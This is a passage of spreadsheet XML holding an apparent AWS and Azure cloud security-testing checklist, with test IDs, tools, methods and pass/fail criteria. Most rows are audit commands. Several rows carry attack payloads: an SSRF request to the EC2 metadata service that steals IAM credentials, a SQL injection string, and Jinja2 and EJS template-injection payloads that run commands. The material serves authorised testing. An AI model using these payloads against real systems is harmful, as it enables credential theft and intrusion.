          <t>Not Started</t>
        </is>
      </c>
      <c r="H21" s="5" t="inlineStr"/>
    </row>
    <row r="22" ht="60" customHeight="1">
      <c r="A22" s="4" t="inlineStr">
        <is>
          <t>CSEC-STOR-002</t>
        </is>
      </c>
      <c r="B22" s="4" t="inlineStr">
        <is>
          <t>S3 Encryption at Rest Verification</t>
        </is>
      </c>
      <c r="C22" s="4" t="inlineStr">
        <is>
          <t>Verify all S3 buckets have server-side encryption enabled; sensitive buckets use KMS customer-managed keys.</t>
        </is>
      </c>
      <c r="D22" s="4" t="inlineStr">
        <is>
          <t>AWS CLI, Prowler</t>
        </is>
      </c>
      <c r="E22" s="4" t="inlineStr">
        <is>
          <t>1. Loop all buckets: aws s3api get-bucket-encryption --bucket $bucket || echo 'NO ENCRYPTION'
2. aws s3api get-bucket-encryption --query "...ApplyServerSideEncryptionByDefault"
3. prowler aws --checks s3_bucket_default_encryption</t>
        </is>
      </c>
      <c r="F22" s="4" t="inlineStr">
        <is>
          <t>Pass: All buckets have SSE-KMS or SSE-S3. Sensitive use SSE-KMS with CMKs. Fail: Any bucket unencrypted at rest.</t>
        </is>
      </c>
      <c r="G22" s="4" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H22" s="4" t="inlineStr"/>
    </row>
    <row r="23" ht="60" customHeight="1">
      <c r="A23" s="5" t="inlineStr">
        <is>
          <t>CSEC-STOR-003</t>
        </is>
      </c>
      <c r="B23" s="5" t="inlineStr">
        <is>
          <t>S3 Access Logging &amp; Audit Trail</t>
        </is>
      </c>
      <c r="C23" s="5" t="inlineStr">
        <is>
          <t>Verify S3 access logging is enabled on all production buckets for breach detection.</t>
        </is>
      </c>
      <c r="D23" s="5" t="inlineStr">
        <is>
          <t>AWS CLI, Prowler</t>
        </is>
      </c>
      <c r="E23" s="5" t="inlineStr">
        <is>
          <t>1. Loop all buckets: aws s3api get-bucket-logging --bucket $bucket
2. prowler aws --checks s3_bucket_logging_enabled
3. Check log destination bucket is protected
4. aws s3api get-bucket-versioning --bucket &lt;log-bucket&gt;</t>
        </is>
      </c>
      <c r="F23" s="5" t="inlineStr">
        <is>
          <t>Pass: Logging on all production buckets. Logs in separate protected bucket. Fail: Logging disabled on any prod bucket.</t>
        </is>
      </c>
      <c r="G23" s="5" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H23" s="5" t="inlineStr"/>
    </row>
    <row r="24" ht="16" customHeight="1">
      <c r="A24" s="12" t="inlineStr">
        <is>
          <t xml:space="preserve">  SSRF &amp; Credential Theft</t>
        </is>
      </c>
    </row>
    <row r="25" ht="60" customHeight="1">
      <c r="A25" s="4" t="inlineStr">
        <is>
          <t>CSEC-CRED-001</t>
        </is>
      </c>
      <c r="B25" s="4" t="inlineStr">
        <is>
          <t>SSRF to EC2 IMDS Credential Theft</t>
        </is>
      </c>
      <c r="C25" s="4" t="inlineStr">
        <is>
          <t>Test if SSRF in AWS-hosted apps can access EC2 metadata service to steal temporary IAM role credentials.</t>
        </is>
      </c>
      <c r="D25" s="4" t="inlineStr">
        <is>
          <t>curl, Burp Suite, AWS CLI</t>
        </is>
      </c>
      <c r="E25" s="4" t="inlineStr">
        <is>
          <t>1. Find SSRF point: test params url, redirect, src, fetch, proxy
2. Test IMDS: curl -s 'https://target.com/fetch?url=http://169.254.169.254/latest/meta-data/'
3. Get role name via IMDS path
4. Steal creds: .../iam/security-credentials/&lt;ROLE-NAME&gt;
5. Use stolen creds: export AWS_ACCESS_KEY_ID=&lt;stolen&gt;; aws sts get-caller-identity</t>
        </is>
      </c>
      <c r="F25" s="4" t="inlineStr">
        <is>
          <t>Pass: SSRF to 169.254.169.254 blocked by WAF. IMDSv2 enforced. Fail: SSRF yields live IAM credentials.</t>
        </is>
      </c>
      <c r="G25" s="4" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H25" s="4" t="inlineStr"/>
    </row>
    <row r="26" ht="60" customHeight="1">
      <c r="A26" s="5" t="inlineStr">
        <is>
          <t>CSEC-CRED-004</t>
        </is>
      </c>
      <c r="B26" s="5" t="inlineStr">
        <is>
          <t>Lambda Environment Variable Secrets Exposure</t>
        </is>
      </c>
      <c r="C26" s="5" t="inlineStr">
        <is>
          <t>Check whether Lambda functions store sensitive credentials in environment variables.</t>
        </is>
      </c>
      <c r="D26" s="5" t="inlineStr">
        <is>
          <t>AWS CLI, Pacu</t>
        </is>
      </c>
      <c r="E26" s="5" t="inlineStr">
        <is>
          <t>1. aws lambda list-functions --output table
2. aws lambda get-function-configuration --query "Environment.Variables"
3. Loop all functions and extract env vars
4. Download and search code: grep -rniE "password|secret|api_key|token" ./function-code/</t>
        </is>
      </c>
      <c r="F26" s="5" t="inlineStr">
        <is>
          <t>Pass: No sensitive values in env vars; secrets from Secrets Manager. Fail: DB passwords/API keys in Lambda env vars.</t>
        </is>
      </c>
      <c r="G26" s="5" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H26" s="5" t="inlineStr"/>
    </row>
    <row r="27" ht="60" customHeight="1">
      <c r="A27" s="4" t="inlineStr">
        <is>
          <t>CSEC-CRED-005</t>
        </is>
      </c>
      <c r="B27" s="4" t="inlineStr">
        <is>
          <t>Cognito Identity Pool Unauthenticated Credential Issuance</t>
        </is>
      </c>
      <c r="C27" s="4" t="inlineStr">
        <is>
          <t>Test if Cognito Identity Pools issue live AWS credentials without any login.</t>
        </is>
      </c>
      <c r="D27" s="4" t="inlineStr">
        <is>
          <t>AWS CLI</t>
        </is>
      </c>
      <c r="E27" s="4" t="inlineStr">
        <is>
          <t>1. aws cognito-identity list-identity-pools --max-results 60
2. aws cognito-identity describe-identity-pool --identity-pool-id &lt;id&gt; | grep AllowUnauthenticatedIdentities
3. Get identity ID without auth
4. aws cognito-identity get-credentials-for-identity --identity-id $IDENTITY_ID
5. Test permissions with returned credentials</t>
        </is>
      </c>
      <c r="F27" s="4" t="inlineStr">
        <is>
          <t>Pass: AllowUnauthenticatedIdentities is false. Fail: Live AWS credentials issued without authentication.</t>
        </is>
      </c>
      <c r="G27" s="4" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H27" s="4" t="inlineStr"/>
    </row>
    <row r="28" ht="16" customHeight="1">
      <c r="A28" s="12" t="inlineStr">
        <is>
          <t xml:space="preserve">  Platform-Specific Attacks</t>
        </is>
      </c>
    </row>
    <row r="29" ht="60" customHeight="1">
      <c r="A29" s="5" t="inlineStr">
        <is>
          <t>CSEC-AWS-001</t>
        </is>
      </c>
      <c r="B29" s="5" t="inlineStr">
        <is>
          <t>AWS CloudTrail Configuration &amp; Integrity</t>
        </is>
      </c>
      <c r="C29" s="5" t="inlineStr">
        <is>
          <t>Verify CloudTrail is enabled in all regions with multi-region trail, log file validation, and protected logs.</t>
        </is>
      </c>
      <c r="D29" s="5" t="inlineStr">
        <is>
          <t>AWS CLI, Prowler</t>
        </is>
      </c>
      <c r="E29" s="5" t="inlineStr">
        <is>
          <t>1. aws cloudtrail describe-trails --include-shadow-trails --query trailList[*]...
2. aws cloudtrail get-trail-status --name &lt;trail-name&gt;
3. aws s3api get-object-lock-configuration --bucket &lt;ct-log-bucket&gt;
4. prowler aws --checks cloudtrail_multi_region_enabled cloudtrail_log_file_validation_enabled
5. aws guardduty list-detectors</t>
        </is>
      </c>
      <c r="F29" s="5" t="inlineStr">
        <is>
          <t>Pass: Multi-region trail, log validation, logs in locked S3, GuardDuty enabled. Fail: CloudTrail not multi-region.</t>
        </is>
      </c>
      <c r="G29" s="5" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H29" s="5" t="inlineStr"/>
    </row>
    <row r="30" ht="60" customHeight="1">
      <c r="A30" s="4" t="inlineStr">
        <is>
          <t>CSEC-AWS-002</t>
        </is>
      </c>
      <c r="B30" s="4" t="inlineStr">
        <is>
          <t>IAM Role Trust Policy Cross-Account Analysis</t>
        </is>
      </c>
      <c r="C30" s="4" t="inlineStr">
        <is>
          <t>Identify IAM roles with trust policies allowing external accounts or wildcard principals.</t>
        </is>
      </c>
      <c r="D30" s="4" t="inlineStr">
        <is>
          <t>AWS CLI, PMapper</t>
        </is>
      </c>
      <c r="E30" s="4" t="inlineStr">
        <is>
          <t>1. aws iam list-roles --query Roles[*]... | filter external accounts, *, Federated
2. aws iam list-open-id-connect-providers
3. Check OIDC sub claims for wildcards: "token.actions.githubusercontent.com:sub": "repo:*"
4. aws iam get-role --role-name &lt;name&gt; --query Role.AssumeRolePolicyDocument</t>
        </is>
      </c>
      <c r="F30" s="4" t="inlineStr">
        <is>
          <t>Pass: Trust policies restrict to specific accounts/OIDC subjects. No wildcards. Fail: Wildcard principals or broad OIDC trust.</t>
        </is>
      </c>
      <c r="G30" s="4" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H30" s="4" t="inlineStr"/>
    </row>
    <row r="31" ht="60" customHeight="1">
      <c r="A31" s="5" t="inlineStr">
        <is>
          <t>CSEC-AWS-003</t>
        </is>
      </c>
      <c r="B31" s="5" t="inlineStr">
        <is>
          <t>AWS Cognito User Pool Security Assessment</t>
        </is>
      </c>
      <c r="C31" s="5" t="inlineStr">
        <is>
          <t>Test Cognito User Pools for user enumeration, weak password policy, missing MFA, insecure auth flows.</t>
        </is>
      </c>
      <c r="D31" s="5" t="inlineStr">
        <is>
          <t>AWS CLI, Burp Suite</t>
        </is>
      </c>
      <c r="E31" s="5" t="inlineStr">
        <is>
          <t>1. aws cognito-idp describe-user-pool --user-pool-id &lt;id&gt; | grep -E PasswordPolicy|MfaConfiguration
2. Test user enum via sign-up (check UsernameExistsException)
3. Test user enum via login (check error message differs)
4. Check explicit auth flows: describe-user-pool-client | grep ExplicitAuthFlows</t>
        </is>
      </c>
      <c r="F31" s="5" t="inlineStr">
        <is>
          <t>Pass: Identical errors for valid/invalid users. MFA enforced. Strong password policy. Fail: Enumeration possible.</t>
        </is>
      </c>
      <c r="G31" s="5" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H31" s="5" t="inlineStr"/>
    </row>
    <row r="32" ht="16" customHeight="1">
      <c r="A32" s="12" t="inlineStr">
        <is>
          <t xml:space="preserve">  Logging, Monitoring &amp; Detection</t>
        </is>
      </c>
    </row>
    <row r="33" ht="60" customHeight="1">
      <c r="A33" s="4" t="inlineStr">
        <is>
          <t>CSEC-LOG-001</t>
        </is>
      </c>
      <c r="B33" s="4" t="inlineStr">
        <is>
          <t>AWS CloudTrail Completeness &amp; Coverage</t>
        </is>
      </c>
      <c r="C33" s="4" t="inlineStr">
        <is>
          <t>Verify CloudTrail captures all management events across all regions with log file integrity validation.</t>
        </is>
      </c>
      <c r="D33" s="4" t="inlineStr">
        <is>
          <t>AWS CLI, Prowler</t>
        </is>
      </c>
      <c r="E33" s="4" t="inlineStr">
        <is>
          <t>1. aws cloudtrail describe-trails --include-shadow-trails ...
2. aws cloudtrail get-trail-status --name &lt;trail-name&gt; | grep IsLogging
3. prowler aws --checks cloudtrail_multi_region_enabled cloudtrail_log_file_validation_enabled cloudtrail_s3_dataevents_read_enabled
4. Verify Object Lock: aws s3api get-object-lock-configuration --bucket &lt;ct-bucket&gt;</t>
        </is>
      </c>
      <c r="F33" s="4" t="inlineStr">
        <is>
          <t>Pass: Multi-region trail, log validation, global events, S3 Object Lock. Fail: Validation disabled or log bucket unprotected.</t>
        </is>
      </c>
      <c r="G33" s="4" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H33" s="4" t="inlineStr"/>
    </row>
    <row r="34" ht="60" customHeight="1">
      <c r="A34" s="5" t="inlineStr">
        <is>
          <t>CSEC-LOG-002</t>
        </is>
      </c>
      <c r="B34" s="5" t="inlineStr">
        <is>
          <t>AWS GuardDuty &amp; Security Hub Enablement</t>
        </is>
      </c>
      <c r="C34" s="5" t="inlineStr">
        <is>
          <t>Verify GuardDuty is enabled in all regions and Security Hub is configured to aggregate findings.</t>
        </is>
      </c>
      <c r="D34" s="5" t="inlineStr">
        <is>
          <t>AWS CLI, Prowler</t>
        </is>
      </c>
      <c r="E34" s="5" t="inlineStr">
        <is>
          <t>1. Check all regions for GuardDuty detectors
2. aws securityhub describe-hub
3. aws securityhub get-enabled-standards
4. prowler aws --checks guardduty_is_enabled securityhub_enabled
5. Review high-severity findings (severity &gt;= 7)</t>
        </is>
      </c>
      <c r="F34" s="5" t="inlineStr">
        <is>
          <t>Pass: GuardDuty in all regions. Security Hub with CIS/AWS standards. Fail: GuardDuty missing or Security Hub not configured.</t>
        </is>
      </c>
      <c r="G34" s="5" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H34" s="5" t="inlineStr"/>
    </row>
    <row r="35" ht="60" customHeight="1">
      <c r="A35" s="4" t="inlineStr">
        <is>
          <t>CSEC-LOG-003</t>
        </is>
      </c>
      <c r="B35" s="4" t="inlineStr">
        <is>
          <t>CloudWatch Alerting for High-Risk Events</t>
        </is>
      </c>
      <c r="C35" s="4" t="inlineStr">
        <is>
          <t>Verify CloudWatch metric filters and alarms exist for CIS AWS Benchmark mandatory high-risk event categories.</t>
        </is>
      </c>
      <c r="D35" s="4" t="inlineStr">
        <is>
          <t>AWS CLI, Prowler</t>
        </is>
      </c>
      <c r="E35" s="4" t="inlineStr">
        <is>
          <t>1. aws cloudwatch describe-alarms ...
2. Check root alarm exists
3. prowler aws --checks cloudwatch_log_metric_filter_root_usage cloudwatch_log_metric_filter_iam_policy_changes cloudwatch_log_metric_filter_cloudtrail_configuration_changes
4. aws logs describe-metric-filters --log-group-name &lt;ct-log-group&gt;</t>
        </is>
      </c>
      <c r="F35" s="4" t="inlineStr">
        <is>
          <t>Pass: All CIS Benchmark 4.x alarms active. Fail: Any required CIS alarm is missing.</t>
        </is>
      </c>
      <c r="G35" s="4" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H35" s="4" t="inlineStr"/>
    </row>
    <row r="36" ht="60" customHeight="1">
      <c r="A36" s="5" t="inlineStr">
        <is>
          <t>CSEC-LOG-004</t>
        </is>
      </c>
      <c r="B36" s="5" t="inlineStr">
        <is>
          <t>VPC Flow Log Enablement &amp; Coverage</t>
        </is>
      </c>
      <c r="C36" s="5" t="inlineStr">
        <is>
          <t>Verify VPC Flow Logs enabled for all VPCs, capturing ALL traffic types, delivered to CloudWatch/S3.</t>
        </is>
      </c>
      <c r="D36" s="5" t="inlineStr">
        <is>
          <t>AWS CLI, Prowler</t>
        </is>
      </c>
      <c r="E36" s="5" t="inlineStr">
        <is>
          <t>1. Check all VPCs for flow logs
2. Verify ALL traffic type: aws ec2 describe-flow-logs --query 'FlowLogs[?TrafficType!=ALL]'
3. prowler aws --checks vpc_flow_logs_enabled</t>
        </is>
      </c>
      <c r="F36" s="5" t="inlineStr">
        <is>
          <t>Pass: Flow logs on all VPCs, TrafficType=ALL, logs in protected S3/CW. Fail: Any VPC lacks flow logs.</t>
        </is>
      </c>
      <c r="G36" s="5" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H36" s="5" t="inlineStr"/>
    </row>
    <row r="37" ht="16" customHeight="1">
      <c r="A37" s="12" t="inlineStr">
        <is>
          <t xml:space="preserve">  Compliance, Hardening &amp; Serverless</t>
        </is>
      </c>
    </row>
    <row r="38" ht="60" customHeight="1">
      <c r="A38" s="4" t="inlineStr">
        <is>
          <t>CSEC-HARD-001</t>
        </is>
      </c>
      <c r="B38" s="4" t="inlineStr">
        <is>
          <t>CIS AWS Benchmark Automated Compliance</t>
        </is>
      </c>
      <c r="C38" s="4" t="inlineStr">
        <is>
          <t>Run comprehensive automated assessment against CIS AWS Foundations Benchmark v1.5.</t>
        </is>
      </c>
      <c r="D38" s="4" t="inlineStr">
        <is>
          <t>Prowler, ScoutSuite, AWS Config</t>
        </is>
      </c>
      <c r="E38" s="4" t="inlineStr">
        <is>
          <t>1. prowler aws --compliance cis_1.5_aws --output-formats html json csv
2. scout aws --profile &lt;profile&gt; --report-dir ./scoutsuite-report/
3. Verify aws configservice describe-configuration-recorders
4. aws securityhub get-enabled-standards | grep cis</t>
        </is>
      </c>
      <c r="F38" s="4" t="inlineStr">
        <is>
          <t>Pass: CIS compliance &gt; 90%. No Critical findings. Fail: Critical findings in CIS Benchmark.</t>
        </is>
      </c>
      <c r="G38" s="4" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H38" s="4" t="inlineStr"/>
    </row>
    <row r="39" ht="60" customHeight="1">
      <c r="A39" s="5" t="inlineStr">
        <is>
          <t>CSEC-HARD-004-AWS</t>
        </is>
      </c>
      <c r="B39" s="5" t="inlineStr">
        <is>
          <t>Encryption at Rest — AWS Services</t>
        </is>
      </c>
      <c r="C39" s="5" t="inlineStr">
        <is>
          <t>Verify all AWS data at rest (S3, RDS, EBS) is encrypted with properly managed keys.</t>
        </is>
      </c>
      <c r="D39" s="5" t="inlineStr">
        <is>
          <t>AWS CLI, Prowler</t>
        </is>
      </c>
      <c r="E39" s="5" t="inlineStr">
        <is>
          <t>1. S3: loop buckets, aws s3api get-bucket-encryption
2. RDS: aws rds describe-db-instances --query ..Encrypted
3. EBS: aws ec2 describe-volumes --query 'Volumes[*].{Encrypted:Encrypted}'
4. aws ec2 get-ebs-encryption-by-default
5. prowler aws --checks s3_bucket_default_encryption rds_instance_storage_encrypted ec2_ebs_volume_encryption_enabled</t>
        </is>
      </c>
      <c r="F39" s="5" t="inlineStr">
        <is>
          <t>Pass: All S3/RDS/EBS encrypted. EBS encryption by default enabled. Fail: Any storage resource without encryption.</t>
        </is>
      </c>
      <c r="G39" s="5" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H39" s="5" t="inlineStr"/>
    </row>
    <row r="40" ht="60" customHeight="1">
      <c r="A40" s="4" t="inlineStr">
        <is>
          <t>CSEC-SLS-001</t>
        </is>
      </c>
      <c r="B40" s="4" t="inlineStr">
        <is>
          <t>Lambda Event Injection — SQL Injection via Event Data</t>
        </is>
      </c>
      <c r="C40" s="4" t="inlineStr">
        <is>
          <t>Test Lambda functions for SQL injection delivered through structured event data from API Gateway, SQS.</t>
        </is>
      </c>
      <c r="D40" s="4" t="inlineStr">
        <is>
          <t>AWS CLI, curl, Burp Suite</t>
        </is>
      </c>
      <c r="E40" s="4" t="inlineStr">
        <is>
          <t>1. Identify event schema via test invocation
2. Classic SQLi: payload {"username": "admin' OR '1'='1"}
3. Union-based injection
4. Time-based: time aws lambda invoke with SLEEP payload
5. Via API Gateway endpoint</t>
        </is>
      </c>
      <c r="F40" s="4" t="inlineStr">
        <is>
          <t>Pass: Event data treated as parameterized. Fail: SQLi alters query behavior or returns unauthorized data.</t>
        </is>
      </c>
      <c r="G40" s="4" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H40" s="4" t="inlineStr"/>
    </row>
    <row r="41" ht="60" customHeight="1">
      <c r="A41" s="5" t="inlineStr">
        <is>
          <t>CSEC-SLS-002</t>
        </is>
      </c>
      <c r="B41" s="5" t="inlineStr">
        <is>
          <t>Lambda SSTI Testing (Jinja2 / EJS)</t>
        </is>
      </c>
      <c r="C41" s="5" t="inlineStr">
        <is>
          <t>Test Lambda functions using templating engines for SSTI leading to RCE within Lambda runtime.</t>
        </is>
      </c>
      <c r="D41" s="5" t="inlineStr">
        <is>
          <t>AWS CLI, Burp Suite</t>
        </is>
      </c>
      <c r="E41" s="5" t="inlineStr">
        <is>
          <t>1. Jinja2 SSTI: payload {"name": "{{7*7}}"} — expect 49 if vulnerable
2. RCE via Jinja2: {{config.__class__.__init__.__globals__["os"].popen("id").read()}}
3. Test EJS (Node.js): payload {"name": "&lt;%= 7*7 %&gt;"}
4. EJS RCE: global.process.mainModule.require('child_process').execSync('id')
5. Read Lambda creds via SSTI: env | grep AWS</t>
        </is>
      </c>
      <c r="F41" s="5" t="inlineStr">
        <is>
          <t>Pass: Template syntax treated as literals, no code execution. Fail: Template expressions evaluate or RCE achieved.</t>
        </is>
      </c>
      <c r="G41" s="5" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H41" s="5" t="inlineStr"/>
    </row>
    <row r="42" ht="60" customHeight="1">
      <c r="A42" s="4" t="inlineStr">
        <is>
          <t>CSEC-SLS-003</t>
        </is>
      </c>
      <c r="B42" s="4" t="inlineStr">
        <is>
          <t>Lambda Dependency Vulnerability Assessment</t>
        </is>
      </c>
      <c r="C42" s="4" t="inlineStr">
        <is>
          <t>Download Lambda packages and scan all third-party dependencies for known CVEs.</t>
        </is>
      </c>
      <c r="D42" s="4" t="inlineStr">
        <is>
          <t>AWS CLI, pip-audit, npm audit, Snyk, Trivy</t>
        </is>
      </c>
      <c r="E42" s="4" t="inlineStr">
        <is>
          <t>1. Download: wget -O code.zip $(aws lambda get-function --query Code.Location)
2. Extract: unzip code.zip -d ./function-analysis/
3. Python: pip-audit -r requirements.txt --output json
4. Node: npm audit --json
5. Trivy: trivy fs ./function-analysis/ --severity CRITICAL,HIGH</t>
        </is>
      </c>
      <c r="F42" s="4" t="inlineStr">
        <is>
          <t>Pass: No critical/high CVEs. No hardcoded creds. Fail: Critical CVEs or credentials in Lambda source code.</t>
        </is>
      </c>
      <c r="G42" s="4" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H42" s="4" t="inlineStr"/>
    </row>
    <row r="43" ht="60" customHeight="1">
      <c r="A43" s="5" t="inlineStr">
        <is>
          <t>CSEC-SLS-004</t>
        </is>
      </c>
      <c r="B43" s="5" t="inlineStr">
        <is>
          <t>Lambda IAM Execution Role Over-Privilege</t>
        </is>
      </c>
      <c r="C43" s="5" t="inlineStr">
        <is>
          <t>Identify Lambda functions with overly permissive IAM execution roles.</t>
        </is>
      </c>
      <c r="D43" s="5" t="inlineStr">
        <is>
          <t>AWS CLI, Prowler, PMapper</t>
        </is>
      </c>
      <c r="E43" s="5" t="inlineStr">
        <is>
          <t>1. aws lambda get-function-configuration --query Role
2. aws iam list-attached-role-policies --role-name &lt;role&gt;
3. aws iam get-policy-version ...
4. Look for Action:'*' or Resource:'*' in Lambda roles
5. aws iam simulate-principal-policy --action-names s3:* iam:* ec2:*</t>
        </is>
      </c>
      <c r="F43" s="5" t="inlineStr">
        <is>
          <t>Pass: Lambda roles minimal-scoped. No Lambda has admin perms. Fail: Lambda with AdministratorAccess or Action:'*'.</t>
        </is>
      </c>
      <c r="G43" s="5" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H43" s="5" t="inlineStr"/>
    </row>
  </sheetData>
  <autoFilter ref="A3:H3"/>
  <mergeCells count="10">
    <mergeCell ref="A4:H4"/>
    <mergeCell ref="A20:H20"/>
    <mergeCell ref="A24:H24"/>
    <mergeCell ref="A16:H16"/>
    <mergeCell ref="A2:H2"/>
    <mergeCell ref="A10:H10"/>
    <mergeCell ref="A28:H28"/>
    <mergeCell ref="A1:H1"/>
    <mergeCell ref="A37:H37"/>
    <mergeCell ref="A32:H32"/>
  </mergeCells>
  <dataValidations count="1">
    <dataValidation sqref="G4:G43" showDropDown="0" showInputMessage="0" showErrorMessage="0" allowBlank="1" type="list">
      <formula1>"Not Started,In Progress,Pass,Fail,N/A,Needs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8D4"/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8" customWidth="1" min="4" max="4"/>
    <col width="60" customWidth="1" min="5" max="5"/>
    <col width="42" customWidth="1" min="6" max="6"/>
    <col width="14" customWidth="1" min="7" max="7"/>
    <col width="30" customWidth="1" min="8" max="8"/>
  </cols>
  <sheetData>
    <row r="1" ht="32" customHeight="1">
      <c r="A1" s="13" t="inlineStr">
        <is>
          <t>☁  Azure Security Testing Checklist</t>
        </is>
      </c>
    </row>
    <row r="2" ht="18" customHeight="1">
      <c r="A2" s="14" t="inlineStr">
        <is>
          <t>CEH v13 · CIS Azure Foundations Benchmark · Microsoft Security Baseline</t>
        </is>
      </c>
    </row>
    <row r="3" ht="22" customHeight="1">
      <c r="A3" s="15" t="inlineStr">
        <is>
          <t>Test ID</t>
        </is>
      </c>
      <c r="B3" s="15" t="inlineStr">
        <is>
          <t>Test Name</t>
        </is>
      </c>
      <c r="C3" s="15" t="inlineStr">
        <is>
          <t>Objective</t>
        </is>
      </c>
      <c r="D3" s="15" t="inlineStr">
        <is>
          <t>Tools</t>
        </is>
      </c>
      <c r="E3" s="15" t="inlineStr">
        <is>
          <t>Methodology Summary</t>
        </is>
      </c>
      <c r="F3" s="15" t="inlineStr">
        <is>
          <t>Pass/Fail Criteria</t>
        </is>
      </c>
      <c r="G3" s="15" t="inlineStr">
        <is>
          <t>Status</t>
        </is>
      </c>
      <c r="H3" s="15" t="inlineStr">
        <is>
          <t>Notes</t>
        </is>
      </c>
    </row>
    <row r="4" ht="16" customHeight="1">
      <c r="A4" s="16" t="inlineStr">
        <is>
          <t xml:space="preserve">  Azure AD (Entra ID) &amp; IAM</t>
        </is>
      </c>
    </row>
    <row r="5" ht="60" customHeight="1">
      <c r="A5" s="4" t="inlineStr">
        <is>
          <t>CSEC-IAM-005</t>
        </is>
      </c>
      <c r="B5" s="4" t="inlineStr">
        <is>
          <t>Azure AD (Entra ID) User, Group &amp; Role Enumeration</t>
        </is>
      </c>
      <c r="C5" s="4" t="inlineStr">
        <is>
          <t>Map complete Azure AD tenant including users, groups, service principals, app registrations, and RBAC assignments.</t>
        </is>
      </c>
      <c r="D5" s="4" t="inlineStr">
        <is>
          <t>Azure CLI, AzureGraph, ROADtools, Prowler</t>
        </is>
      </c>
      <c r="E5" s="4" t="inlineStr">
        <is>
          <t>1. az ad user list --output table
2. az ad group list --output table
3. az ad sp list --output table
4. az role assignment list --all --query "[?roleDefinitionName=='Owner']"
5. python3 AzureGraph.py --get-all-users; --get-privileged-roles
6. roadrecon gather; roadrecon gui</t>
        </is>
      </c>
      <c r="F5" s="4" t="inlineStr">
        <is>
          <t>Pass: IAM enumeration restricted. Fail: All Azure AD objects fully enumerable.</t>
        </is>
      </c>
      <c r="G5" s="4" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H5" s="4" t="inlineStr"/>
    </row>
    <row r="6" ht="60" customHeight="1">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>CSEC-IAM-007-AZ</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>MFA Enforcement Assessment (Azure)</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>Verify MFA is enforced for all Azure AD users, especially privileged accounts.</t>
        </is>
      </c>
      <c r="D6" s="5" t="inlineStr">
        <is>
          <t>Azure CLI, Prowler</t>
        </is>
      </c>
      <c r="E6" s="5" t="inlineStr">
        <is>
          <t>1. prowler azure --checks iam_ensure_mfa_is_enabled_for_all_users
2. Check Conditional Access policies for MFA requirement
3. az ad user list and cross-reference MFA registration
4. Check Global Admin accounts specifically</t>
        </is>
      </c>
      <c r="F6" s="5" t="inlineStr">
        <is>
          <t>Pass: MFA enabled for all users. Fail: Any Azure user with console access lacks MFA.</t>
        </is>
      </c>
      <c r="G6" s="5" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H6" s="5" t="inlineStr"/>
    </row>
    <row r="7" ht="16" customHeight="1">
      <c r="A7" s="16" t="inlineStr">
        <is>
          <t xml:space="preserve">  Azure Blob Storage Security</t>
        </is>
      </c>
    </row>
    <row r="8" ht="60" customHeight="1">
      <c r="A8" s="4" t="inlineStr">
        <is>
          <t>CSEC-STOR-004</t>
        </is>
      </c>
      <c r="B8" s="4" t="inlineStr">
        <is>
          <t>Azure Blob Storage Public Access Assessment</t>
        </is>
      </c>
      <c r="C8" s="4" t="inlineStr">
        <is>
          <t>Identify Azure storage accounts and containers with public blob access; test for unauthenticated data access.</t>
        </is>
      </c>
      <c r="D8" s="4" t="inlineStr">
        <is>
          <t>Azure CLI, Prowler, curl</t>
        </is>
      </c>
      <c r="E8" s="4" t="inlineStr">
        <is>
          <t>1. az storage account list --query "[*].{Name:name,AllowBlobPublicAccess:allowBlobPublicAccess}"
2. az storage container list --query "[*].{Name:name,PublicAccess:properties.publicAccess}"
3. Test anonymous: curl -s "https://&lt;account&gt;.blob.core.windows.net/&lt;container&gt;?restype=container&amp;comp=list"
4. prowler azure --checks storage_blob_public_access_level_is_disabled</t>
        </is>
      </c>
      <c r="F8" s="4" t="inlineStr">
        <is>
          <t>Pass: AllowBlobPublicAccess=false on all accounts. All containers require auth. Fail: Any container allows unauthenticated access.</t>
        </is>
      </c>
      <c r="G8" s="4" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H8" s="4" t="inlineStr"/>
    </row>
    <row r="9" ht="16" customHeight="1">
      <c r="A9" s="16" t="inlineStr">
        <is>
          <t xml:space="preserve">  SSRF &amp; Managed Identity Token Theft</t>
        </is>
      </c>
    </row>
    <row r="10" ht="60" customHeight="1">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>CSEC-CRED-002</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>SSRF to Azure IMDS Managed Identity Token Theft</t>
        </is>
      </c>
      <c r="C10" s="5" t="inlineStr">
        <is>
          <t>Test SSRF in Azure-hosted apps to steal Managed Identity access tokens from Azure IMDS.</t>
        </is>
      </c>
      <c r="D10" s="5" t="inlineStr">
        <is>
          <t>curl, Burp Suite, Azure PowerShell</t>
        </is>
      </c>
      <c r="E10" s="5" t="inlineStr">
        <is>
